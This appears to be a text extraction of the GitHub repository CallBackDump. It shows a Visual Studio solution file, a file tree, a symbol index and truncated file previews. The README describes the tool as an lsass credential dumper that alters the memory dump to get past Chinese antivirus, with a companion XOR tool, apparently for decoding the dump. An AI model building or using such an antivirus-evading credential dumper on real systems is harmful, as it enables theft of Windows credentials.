MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "dumpXor", "dumpXor\dumpXor.vcxproj", "{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x64.ActiveCfg = Debug|x64
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x64.Build.0 = Debug|x64
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x86.ActiveCfg = Debug|Win32
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Debug|x86.Build.0 = Debug|Win32
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x64.ActiveCfg = Release|x64
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x64.Build.0 = Release|x64
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x86.ActiveCfg = Release|Win32
{9CC63DB2-7FC6-4D54-A0E4-CD91E124BFD4}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {5CB8FD33-C656-4F9D-A594-3BF54C71E196}
EndGlobalSection
EndGlobal
gitextract_e5ddyv_y/
├── CallbackDump/
│ ├── CallbackDump/
│ │ ├── CallbackDump.aps
│ │ ├── CallbackDump.rc
│ │ ├── CallbackDump.vcxproj
│ │ ├── CallbackDump.vcxproj.filters
│ │ ├── CallbackDump.vcxproj.user
│ │ ├── global.h
│ │ ├── main.cpp
│ │ └── resource.h
│ └── CallbackDump.sln
├── README.md
└── dumpXor/
├── dumpXor/
│ ├── dumpXor.vcxproj
│ ├── dumpXor.vcxproj.filters
│ ├── dumpXor.vcxproj.user
│ └── main.cpp
└── dumpXor.sln
SYMBOL INDEX (4 symbols across 2 files)
FILE: CallbackDump/CallbackDump/main.cpp
function BOOL (line 15) | BOOL CALLBACK minidumpCallback(
function nt_wait (line 62) | void nt_wait(DWORD milliseconds)
function main (line 82) | int main(int argc, char* argv[]) {
FILE: dumpXor/dumpXor/main.cpp
function main (line 6) | int main(int argc, char* argv[]) {
Condensed preview — 15 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (33K chars).
[
{
"path": "CallbackDump/CallbackDump/CallbackDump.rc",
"chars": 2266,
"preview": "// Microsoft Visual C++ generated resource script.\r\n//\r\n#include \"resource.h\"\r\n\r\n#define APSTUDIO_READONLY_SYMBOLS\r\n////"
},
{
"path": "CallbackDump/CallbackDump/CallbackDump.vcxproj",
"chars": 6927,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "CallbackDump/CallbackDump/CallbackDump.vcxproj.filters",
"chars": 1268,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "CallbackDump/CallbackDump/CallbackDump.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "CallbackDump/CallbackDump/global.h",
"chars": 2066,
"preview": "#pragma once\r\n\r\n\r\ntypedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)(\r\n\tULONG Privilege, BOOL Enable,\r\n\tBOOL CurrentThread, P"
},
{
"path": "CallbackDump/CallbackDump/main.cpp",
"chars": 4625,
"preview": "#include <windows.h>\r\n#include <DbgHelp.h>\r\n#include <iostream>\r\n#include <TlHelp32.h>\r\n#include <processsnapshot.h>\r\n#p"
},
{
"path": "CallbackDump/CallbackDump/resource.h",
"chars": 375,
"preview": "//{{NO_DEPENDENCIES}}\r\n// Microsoft Visual C++ generated include file.\r\n// Used by CallbackDump.rc\r\n\r\n// ¶һĬֵ\r\n// \r\n#ifd"
},
{
"path": "CallbackDump/CallbackDump.sln",
"chars": 1455,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.3.3"
},
{
"path": "README.md",
"chars": 701,
"preview": "# CallBackDump\n\n能过国内杀软的dump lsass进程工具,参考代码链接在下面。\n\n由minidumpCallback实现,对缓冲区中内存做了些修改后再写入磁盘,同时做了一些小细节修改。\n\n需要注意的是别扔云沙箱,这工具也没"
},
{
"path": "dumpXor/dumpXor/dumpXor.vcxproj",
"chars": 6731,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/ms"
},
{
"path": "dumpXor/dumpXor/dumpXor.vcxproj.filters",
"chars": 938,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "dumpXor/dumpXor/dumpXor.vcxproj.user",
"chars": 166,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/m"
},
{
"path": "dumpXor/dumpXor/main.cpp",
"chars": 764,
"preview": "\r\n#include <stdio.h>\r\n\r\n\r\n\r\nint main(int argc, char* argv[]) {\r\n\r\n\r\n int keylen, index = 0;\r\n char* source, * dest"
},
{
"path": "dumpXor/dumpXor.sln",
"chars": 1440,
"preview": "\r\nMicrosoft Visual Studio Solution File, Format Version 12.00\r\n# Visual Studio Version 17\r\nVisualStudioVersion = 17.3.3"
}
]
// ... and 1 more files (download for full content)
About this extraction
This page contains the full source code of the seventeenman/CallBackDump GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 15 files (29.2 KB), approximately 8.7k tokens, and a symbol index with 4 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.